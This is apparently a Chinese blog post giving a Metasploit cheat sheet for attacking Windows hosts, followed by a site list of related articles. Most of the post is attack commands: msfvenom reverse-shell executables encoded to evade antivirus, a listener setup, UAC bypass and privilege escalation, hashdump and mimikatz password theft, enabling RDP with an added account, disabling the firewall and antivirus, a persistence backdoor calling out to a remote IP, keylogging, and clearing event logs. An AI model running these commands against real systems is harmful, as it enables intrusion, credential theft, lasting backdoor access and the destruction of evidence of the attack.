metasploit使用方法

最新推荐文章于 2024-04-23 18:32:05 发布
最新推荐文章于 2024-04-23 18:32:05 发布
阅读量1.1k 收藏
点赞数 1
文章标签: 前端 javascript web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54030686/article/details/121367626
版权

metasploit使用
主要功能 可以对目标进行扫描探测,漏洞利用,提权,获取hash以及横向渗透
分为正向连接和反向连接,即主机连接目标,目标连接主机
反向连接优势:即使目标存在waf,生成的木马不被检测即可反弹shell
本机ip为192.168.0.2 监听端口为4444 目标主机为192.168.0.5,已获取目标低权限shell
设置端口时可以设置为8080,22,80等常见端口,避免防火墙检测
主要流程为
生成木马,上传目标主机(执行木马获取shell)或者直接使用exp获取shell
生成二进制文件
msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ -i 3 lhost=192.168.0.1 lport=4444 -f exe >shell.exe
-a 符合目标主机的架构
–platform 系统平台为windows
-p 使用的有效载荷为windows下正向链接的tcp连接,如果连接成功会返回一个shell 在这里,除了正向连接还有反向连接 可以使用# msfvenom -l payload 查看所有载荷
-e 使用编码x86/shikata_ga_nai,以增加绕过目标主机的机率 ,可以使用msfvenom -l encoders列出有效编码
-b 特征码绕过,防止杀软通过特征码进行查杀
-i 编码次数
-f 输出格式
msfvenom -p linux/x86/meterpreter/bind_tcp lport=4444 -f elf -o shell正向连接主要为内网连接主机,不需要设置ip
正向连接为bind_tcp

实现方式
msfconsole启动
生成php
msfvenom -p windows/shell/reverse_tcp lhost=192.168.0.1 lport=4444 -f exe >/root/shell.exe
上传文件后,监听4444端口

use exploit/multi/handler
set payload windows/shell/reverse_tcp(可以使用info windows/shell/reverse_tcp查看信息)
show options(查看需要设置的条件)
set lhost 192.168.0.1
set lport 4444
run(exploit)执行
如果目标存在某种cms漏洞,以dedecms为例
search dedecms (查询dedecms以往漏洞)
use /root/dedecms1.7
show options
set(设置参数)
run(exploit -h可以指定参数使用exploit -z 不进入shell)
linux执行文件为elf
获取shell后
help即可查看能够运行的命令
提权
getuid
查看当前用户
ps所有进程
使用getsystem进行提权
uac实际上就是window右键以管理员身份运行时,系统出现的弹窗
byuac不进行弹窗以管理员身份运行,反弹获取的shell为system
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
use exploit/windows/local/bypassuac_fodhelperuse exploit/windows/local/bypassuac_eventvwr
exploit/windows/local/bypassuac_comhijack
search byuac 即可
绕不过去的话使用
use post/multi/recon/local_exploit_suggester
使用此脚本进行检测,报错率较高,使用显示出的脚本路径
获取hash
第一种方法
hashdump(获取加密后的账号密码)
第二种方法
1
load mimikatz
msv(与hashdump差不多)
kerberos
wdigest
tspkg(获取系统账户信息,获得明文密码)
2.
load mimikatz #加载mimikatz
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords
开启远程3389端口
run post/windows/manage/enable_rdp
run getgui -e
run post/windows/manage/enable_rdp username=“abc” password=“abc”(添加账户,密码)
执行成功,可以使用kali的rdesktop命令使用远程桌面连接目标主机
rdesktop -u abc -p abc 192.168.250.176:3389
migrate pid(迁移进程)
killav
netsh adcfirewall set allprofiles state off(关闭防火墙)
run persistence -X -i 5 -p 4444 -r 172.17.11.18 (植入后门程序,权限维持)
run keylogrecorder”命令为记录键盘信息
clearev清除事件日志
未涉及横向,下一篇为横向

天下是个小趴菜
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
34. Metasploit通过samba服务获取shell
__Qian的博客
03-13 774
1.使用nmap扫描端口 2.收集到目标机相关信息后,为其选择正确的Exploit和合适的Payload,从扫描结果发现主机运行着Samba 3.x服务 输入search samba 命令搜索Smaba的漏洞利用模块 3.选择漏洞利用模块 因为exploit/multi/samba/usermap_script 模块被标记为“Excellent”,即为最杰出而且时间是最新的,选择次模块进行渗透...
kali使用Metasploit Framework(msf)获取shell
Mrw的博客
04-05 2785
简介 Metasploit Framework是一个编写,测试和使用exploit代码的完善环境。这个环境为渗透测试,shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Ruby编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。 Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插...
渗透测试工具——Metasploit
热门推荐
weixin_59872639的博客
01-14 3万+
Metasplout简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具。 Metasploit核心中绝大部分有Rudy实现,一小部分由汇编和C语言实现。 kali中自带Metasploit Metasploit文件结构与模块 路径: /usr/share/metasploit-framework/ config: MSF环境配置信息,数据库配置信息 data:后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息 doc
永恒之蓝ms17-010漏洞利用(提取meterpreter权限获取shell,进入windows 远程操控主机)
qq_42527761的博客
07-19 1万+
最近在学习The-Hacker-Playbook-3这本书,书中介绍的红队的第一个核心工具:Metasploit 框架,尽管 Metasploit 框架从 2003 年开发的,但它现在仍然是一个非常棒的工具。有最初的开发者 H.D. Moore 和非常活跃的社区为它提供持续支持。这个社区的驱动的框架,拥有着所有最新的公开漏洞的利用、后渗透利用模块、辅助模块等等。对于红队项目,我们可以使用 Metasploit 通过MS17-010永恒之蓝漏洞危害内部系统,以获得我们的第一个内网 shell,或者
Metasploit安装及使用教程(非常详细)从零基础入门到精通,看完这一篇就够了
最新发布
m0_71746416的博客
04-23 1083
MSF保姆级教程
metasploit获取shell之后进一步利用!metasploit+sessions
weixin_34060741的博客
11-30 1285
当你用metasploit成功的***一台Windows主机后,你会获得一个Meterpreter 的Shell,今天我就会给大家讲一讲Meterpreter 获取shell以后的运用 当你看到了 [*] Meterpreter session 1 opened (192.168.195.140:4444 -> 192.168.195.139:1051) 这就代...
Metasploit 基本使用方法
qq_45541451的博客
11-23 1508
Metasploit 基本使用方法 1.手动启动数据库 systemctl start postgresql systemctl enable postgresql 2.第二种使用终端命令 msfconsole help Core Commands #核心命令 Module Commands #模块命令 Job Commands #后台任务命令 Resource Script Commands #资源脚本命令 Database Backend Commands #数据库后端命令 Credentials Ba
Metasploit 安装方法.pdf
05-19
Metasploit 安装方法 Metasploit 是一个流行的渗透测试框架,旨在帮助安全专业人员和研究人员自动化攻击和渗透测试过程。下面是 Metasploit 安装方法的详细步骤: 1. 下载 Metasploit 框架 首先,您需要从官方...
Python实现远程调用MetaSploit方法
12-23
本文较为详细的讲述了Python实现远程调用MetaSploit方法,对Python的学习来说有很好的参考价值。具体实现方法如下: (1)安装Python的msgpack类库,MSF官方文档中的数据序列化标准就是参照msgpack。 root@kali:...
Metasploit教程
06-07
Metasploit教程Metasploit教程Metasploit教程Metasploit教程
metasploit使用
11-05
- **metasploit_he_pentration_tester's_guide.pdf**: 可能是Metasploit渗透测试者的指南,涵盖从基础到进阶的Metasploit使用方法。 - **Packtpub.Metasploit.Penetration.Testing.Cookbook.Jun.2012.pdf**: 这本...
metasploit
12-19
后渗透的多种方法,meterpreter 在获取shell之后,如何持续控制目标主机,即在目标主机重启或下次开机后能自动连接到攻击主机上,不必每次都需要进行攻击取得 meterpreter。
metasploit基础学习 渗透(拿shell)和后渗透(留后门)
qq_38348692的博客
08-10 3492
使用metasploit时,要保持更新的好习惯,更新kali源 ,以及漏洞数据库,更新命令: (1)apt-get update:更新软件包的索引源,作用是同步源的软件包索引 (2)apt-get upgrade: 升级系统上安装的所有软件包 (3)apt-get dist-upgrade: 升级整个linux系统,包括内核升级 专业术语 (1)Auxiliaries:辅助模块,负责执行扫...
Metasploit详细教程
Kali与编程
03-24 2162
Metasploit是一种功能强大的漏洞利用工具集,帮助用户测试网络安全并确认可能的漏洞。您可以从Metasploit官方网站下载适用于您操作系统的Metasploit框架。在成功启动Metasploit后,您需要查找目标设备并确定其IP地址、端口号和运行的服务。在选择漏洞后,您需要选择一个可用的模块以利用该漏洞。在选择了模块后,您需要设置所需的参数。该命令将扫描指定IP地址的所有开放端口,并识别运行的服务。该命令将列出所有与Apache相关的已知漏洞。该命令将显示所有可用选项,并允许您设置值。
Metasploit使用教程
Kali与编程
03-23 1898
例如,payload/windows/meterpreter/reverse_tcp是一个Windows系统的Meterpreter反向Shell Payload,可以建立与攻击机的反向连接并提供完全的系统访问权限。Payload模块是Metasploit中最重要的模块之一,它用于实现对目标系统的控制。Metasploit支持多种不同的操作系统(Windows、Linux、MacOS等)和硬件平台(x86、ARM等),并提供了多种编程接口,包括Ruby API、Python API、Java API等。
初学者的Metasploit教程 - 从基础到高级
简介
02-01 3681
如果您曾经尝试利用某些易受攻击的系统,那么您很可能已经使用Metasploit,或者至少熟悉这个名称。它允许您查找有关系统漏洞的信息,使用现有漏洞渗透系统,帮助创建自己的漏洞等等。在本教程中,我们将详细介绍 Metasploit 框架的基础知识,并向您展示如何充分利用这个强大工具的真实示例。提示:以下是本篇文章正文内容,下面案例可供参考Meterpreter是一个Metasploit有效载荷,它提供了一个交互式shell,攻击者可以在受害者系统上使用和执行代码。它使用内存中 DLL 注入进行部署。
Metasploit安装及使用教程(非常详细)从零基础入门到精通,看完这一篇就够了。
2201_75735270的博客
01-22 650
通过本篇文章,我们将会学习以下内容:1、在Windows上安装Metasploit2、在Linux和MacOS上安装Metasploit3、在Kali Linux中使用 Metasploit4、升级Kali Linux5、使用虚拟化软件构建渗透测试实验环境6、配置SSH连接7、使用SSH连接Kali8、配置PostgreSQL数据库9、创建工作区10、使用数据库11、使用hosts命令12、理解services命令。
Metasploit入门使用手册
anan的博客
03-18 9196
通过学习msf总结的笔记,内容还在持续完善中,欢迎阅读!
Metasploit入门教程(非常详细)从零基础入门到精通,看完这一篇就够了!
m0_74131821的博客
05-27 2839
Metasploit之所以流行,是因为它可以执行广泛的安全测试任务,从而简化渗透测试的工作。Metasploit 适用于所有流行的操作系统,本文中,主要以Kali Linux为主。因为Kali Linux预装了 Metasploit框架和运行在框架上的其他第三方工具

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值